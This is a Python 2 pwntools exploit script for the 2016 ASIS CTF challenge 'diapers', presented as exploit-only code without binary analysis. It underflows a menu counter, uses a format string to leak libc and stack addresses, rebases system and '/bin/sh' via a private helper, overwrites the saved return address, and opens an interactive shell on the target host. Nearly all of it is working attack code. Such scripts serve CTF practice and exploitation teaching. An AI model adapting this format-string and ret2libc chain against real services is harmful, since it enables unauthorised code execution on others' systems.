2016 ASIS CTF — diapers (exploit only)
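"""2016 ASIS CTF "diapers" -- exploit script only (no binary analysis here).

by St1tch

What the script drives, as far as the menu traffic below shows:
  1. pick option 3, then send option 1 257 times (the original comment calls
     this a stack underflow -- presumably walking an index below zero);
  2. through option 0 ("change to:") plant a format string that leaks two
     stack slots, ``%55$p`` and ``%6$p``, and trigger it with option 2 -- the
     first is treated as a libc return address, the second as a stack pointer;
  3. resolve ``system`` and ``"/bin/sh"`` via the author's private helper
     ``stitch.find_libc`` (not shown) from the low 12 bits of the libc leak;
  4. plant a second format string built by ``stitch.fsb`` that writes
     ``system`` over the saved return address and the ``"/bin/sh"`` pointer
     8 bytes above it, trigger it with option 2 and drop to a shell.

Written for Python 2 and an older pwntools (``raw_input``, ``str`` payloads,
``str.split`` on the received data).  ``stitch`` is not a public package.
"""
from pwn import *
import stitch

# Flip to run against a local copy of the service instead of the CTF host.
local = False
if local:
    s = remote('localhost', 9988)
else:
    s = remote('diapers.asis-ctf.ir', 1343)
# Block until Enter is pressed -- leaves time to attach a debugger to the target.
raw_input()

# Number of option-1 presses the original sends before the leak.
UNDERFLOW_STEPS = 257
# Every "change to:" input is padded to exactly this many bytes.
PAYLOAD_LEN = 108
# Distance from the leaked %6$p value down to the saved return address.
# NOTE(review): constant carried over from the original, not re-derived here.
RET_DELTA = 156


def _hex_to_int(token):
    """Parse one ``%p`` token (``0x...`` or bare hex) into an int.

    The original used ``x.strip('0x')``, which strips every leading *and
    trailing* ``'0'``/``'x'`` character, so any address ending in ``0`` was
    truncated and parsed to the wrong value.  ``int(..., 16)`` accepts the
    ``0x`` prefix directly, so no stripping is needed.
    """
    return int(token, 16)


def _low12(addr):
    """Return the last three hex digits of ``addr`` as a string.

    This is the page-offset part of the leak that ``stitch.find_libc`` is
    given to identify the remote libc build.
    """
    return '%03x' % (addr & 0xfff)


def _pad(pay):
    """Pad ``pay`` with ``'A'`` up to PAYLOAD_LEN (unchanged if already longer)."""
    return pay + 'A' * (PAYLOAD_LEN - len(pay))


def main():
    """Run the exploit over the already-opened connection ``s``.

    Returns early (after logging) if the leak does not come back in the
    expected ``#<libc>#<stack>#`` shape; otherwise hands the shell to the user
    via ``s.interactive()``.
    """
    p = log.progress('start pwning....')

    # Step 1: option 3, then option 1 repeated until the counter wraps.
    p.status('select first')
    s.recvuntil('> ')
    s.sendline('3')
    for i in range(1, UNDERFLOW_STEPS + 1):
        p.status('%dth minus' % i)
        s.recvuntil('> ')
        sleep(0.1)  # pace the sends; the original paused here as well
        s.sendline('1')

    # Step 2: leak a libc return address (%55$p) and a stack pointer (%6$p).
    # The '#' separators make the echoed values easy to cut out again.
    p.status('leak libc and stack')
    s.recvuntil('> ')
    s.sendline('0')
    s.recvuntil('change to: ')
    pay = 'a' * 15
    pay += '#%55$p#%6$p#'
    s.sendline(_pad(pay))
    s.recvuntil('> ')
    s.sendline('2')
    leaks = s.recvuntil('> ').split('#')
    if len(leaks) < 3:
        # Original crashed with an unpack ValueError here; fail with context instead.
        log.failure('unexpected leak output: %r' % (leaks,))
        return
    libc_leak = _hex_to_int(leaks[1])
    ret_addr = _hex_to_int(leaks[2]) - RET_DELTA

    # Step 3: identify the libc and rebase system / "/bin/sh" on the leak.
    p.status('find system and binsh')
    libc = stitch.find_libc({'main_ret': _low12(libc_leak)})[0]
    offset = libc_leak - libc['main_ret']
    system = offset + libc['system']
    binsh = offset + libc['binsh']

    # Step 4: format-string write of system over the saved return address and
    # the "/bin/sh" pointer at +8 (the +4 slot is the dummy return seen by
    # system -- presumably a 32-bit target, judging by the +8 spacing).
    p.status('overwrite memory')
    s.sendline('0')
    s.recvuntil('change to: ')
    pay = 'A' * 15
    pay += stitch.fsb(18, {ret_addr: system, ret_addr + 8: binsh}, 0)
    s.sendline(_pad(pay))
    s.recvuntil('> ')
    s.sendline('2')

    p.success('Good!')
    log.success('Get shell!!')
    s.interactive()


if __name__ == '__main__':
    main()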
